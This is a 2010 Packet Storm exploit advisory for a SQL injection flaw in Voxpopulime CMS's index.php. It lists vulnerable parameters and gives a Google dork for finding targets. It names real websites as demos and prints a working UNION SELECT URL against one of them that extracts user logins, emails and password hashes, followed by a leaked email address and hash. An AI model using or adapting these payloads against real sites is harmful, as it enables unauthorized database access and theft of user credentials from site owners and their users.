Voxpopulime CMS SQL Injection

2010-11-26T00:00:00
ID PACKETSTORM:96156
Type packetstorm
Reporter KnocKout
Modified 2010-11-26T00:00:00

Description

                                        
                                            `================================================================  
Voxpopulime CMS <= (index.php) SQL Injection Vulnerability  
================================================================  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1  
3 3  
3 _ __ __ ________ __ __ 3  
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7  
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1  
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3  
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3  
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7  
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1  
3 >> Exploit database separated by exploit 3  
3 type (local, remote, DoS, etc.) 3  
7 7  
1 [+] Site : 1337db.com 1  
3 [+] Support e-mail : submit[at]1337db.com 3  
3 3  
7 ############################################ 7  
1 I'm KnocKout 1337 Member from 1337 DataBase 1  
3 ############################################ 3  
3 3   
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockoutr@msn.com  
[~] HomePage : http://h4x0resec.blogspot.com  
[~] Reference : http://h4x0resec.blogspot.com  
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Voxpopulime  
|~Price : N/A  
|~Version : Real Estate Management System   
|~Software: http://voxpopulime.com/  
|~Vulnerability Style : SQL Injection  
|~Vulnerability Dir : /  
|~sqL : MysqL   
|~Google Keyword : "Powered By voxpopulime.com" inurl:index.php?m=  
|[~]Date : "26.11.2010"  
|[~]Tested on : (L):Vista (R):Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e mod_auth_pgsql/2.0.3 PHP/5.2.13 MYSQL  
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Demos:   
http://www.asasworld.ae  
http://www.tpsdubai.com  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
===============================================================  
|{~~~~~~~~ Explotation| index.php SQL Injection~~~~~~~~~~~}|  
  
http://$Site/$path/index.php?m=developments&act=list&main_id=-138 {SQL Injection}  
http://$Site/$path/index.php?m=pages&act=pages&pages_id=7 {SQL Injection}  
http://$Site/$path/index.php?m=developments&act=list&main_id=-1 {SQL Injection}  
  
Ex; http://www.asasworld.ae/  
  
[~] SQL Injecting  
http://www.asasworld.ae/index.php?m=developments&act=list&main_id=-138%20union%20select%201,concat%28user_login,0x3a,user_email,0x3a,password%29,3,4,5,6,7,8,9%20from%20site_users/*  
[~] MySQL writes : info@asasworld.ae:796ab97a7094304e057acd7c412fcab9  
  
To your continue..  
  
=============================================================  
gOODLuck;)  
`